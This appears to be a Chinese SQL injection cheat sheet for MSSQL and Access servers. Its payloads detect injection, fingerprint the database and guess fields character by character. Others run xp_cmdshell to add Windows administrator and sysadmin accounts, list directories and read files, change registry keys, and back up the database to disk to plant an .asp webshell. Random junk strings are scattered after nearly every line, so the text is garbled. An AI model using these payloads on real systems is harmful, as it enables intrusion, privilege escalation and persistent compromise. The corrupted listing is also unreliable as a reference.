1.判断是否有注入;and 1=1 ;and 1=2 ;l'I.j
2.初步判断是否是mssql ;and user>0 @w0[5ZAj
FQyiIT6
3.注入参数是字符'and [查询条件] and ''=' \<} nn?~n
~a $%
a
4.搜索时没过滤参数的'and [查询条件] and '%25'=' BlUY9`VWh@
$$@Tgkg?o
5.判断数据库系统 _$0Ix6y,
Y"@k vd
;and (select count(*) from sysobjects)>0 mssql l-
l}xBf
Li2)~4p><
;and (select count(*) from msysobjects)>0 access 7@F B^[H:y
IjNm/${$
AZa3!e/1
G\Me%{b#
6.猜数据库 ;and (select Count(*) from [数据库名])>0 oC
[g
Ij+zR>P8=\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 7XNfH@
X'c5s~9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 [3.rG!Na
?,j:Y0l.L
9.(1)猜字段的ascii值(access) 1f=L8Dr
H2]I__t/u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^{w&&+#,q
j!s&yHE1
(2)猜字段的ascii值(mssql) &eg,*K} '
ld
$`5!Z
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 i"'k|TGW^
6voK{C4J
10.测试权限结构(mssql) 4g 1h:I/
j-
A|\:
)d(cXN-T
z,9qAts?mh
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [V2l&ZUni
u7mj
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- )oj`K,#
[D t`@Dm
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \o^+'4hq<5
/Hx\ gtV
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- r#XDgZtI
cZu:dwE
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- C?O{l%0
2d._X$fx7
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 7@sWT<P
$OT:J
;and 1=(select IS_MEMBER('db_owner'));-- &0#qy9wx
F JzjS;
C.@zVt
t~AesHZpk
11.添加mssql和系统的帐户 Rwr0$_A
=y':VIVJC
;exec master.dbo.sp_addlogin username;-- p;@PfhEz)
;exec master.dbo.sp_password null,username,password;-- $d"6y
1kpI?Plki
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- b ,cvQD
F kWJB>
;exec master.dbo.xp_cmdshell 'net user username password \z_@.Jw{
'.iUv#j4Sh
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- +b{\v1b
"-hgeQX
;exec master.dbo.xp_cmdshell 'net user username password /add';-- dI>oHMC
f5G17: Q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- p?}Rolk7
MB#%k#z`B
D\k);BU~
`S!`=26Z!
12.(1)遍历目录 $Ec;w~e
lu >>~vy6
;create table dirs(paths varchar(100), id int) snyx$Qx(
YB 4R8}4
;insert dirs exec master.dbo.xp_dirtree 'c:\' =Xp3UNXg
qYpHH!!C=
;and (select top 1 paths from dirs)>0 TWn7&,N
GJ*AyYG
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Ad"::&&Wk
`Q{kiy
^iGIF~J9
9`b*Y*d
(2)遍历目录 [iDa6mcth
.z_^_@qdm
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- k<:!^_3H
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 MM97$
-<|Ebh d3
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 LJBoS]~
4TLh'?Xu9
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 *kDXx&7B$
6Fm.^9@
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @ O%m,
IlaH,J7n
sx/g5?zh
s#d>yx_b
13.mssql中的存储过程 >z(6ADq
[*1c.&%(
xp_regenumvalues 注册表根键, 子键 AD8~
wi9fYfuv3R
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 "e_ED*
x.d9mjLN8m
xp_regread 根键,子键,键值名 C&"8A\we
$H_4Y-xOi
;exec xp_regread ok7DI
R+^/(Ws'<
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 BkIvoW_
yX8F^iv[
xp_regwrite 根键,子键, 值名, 值类型, 值 #Uudx~b
']qC,;2
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 s_RYYaM
6z/8nf +u
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 1z8.wdWJ}
GM@TWwG-B
xp_regdeletevalue 根键,子键,值名 hwexv 9""
Vv zd>yII
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 iA%3cpIc(Z
3 \kT#nr
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 n:7=z0
s
Ue8_Q8q5
A^g81s.5
S;CT:kG6Y{
14.mssql的backup创建webshell ~kYF/B2*
zmuq4-.
use model dso\+s
.%*.nq
create table cmd(str image); JhuKW>7
( /uL6W d0
insert into cmd(str) values (''); 0V1kZ.
*A_
backup database model to disk='c:\l.asp'; u_mm*o~)g
~>{<r{H"S
NeNKOW#X
8_KXli}7=
15.mssql内置函数 :CH'Bt4<
S:DB%V3
;and (select @@version)>0 获得Windows的版本号 Wqy8ZgSC
vnIxI a
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2wu
5`Z[E
V @8X.R>
;and (select user_name())>0 爆当前系统的连接用户 F@?QVdY1q7
}p&aI?-B
;and (select db_name())>0 得到当前连接的数据库 OD*DHC2rN]
N\H(AzMw
dLjT^ 9
}De)_E\~
16.简洁的webshell {\ .2h
O1/!)E!
use model %zY3,4~
&M<431y
create table cmd(str image); k"AY7vq@!P
~-.q<8
insert into cmd(str) values (''); #`?uV)(
#&DJ3(T
backup database model to disk='g:\wwwtest\l.asp';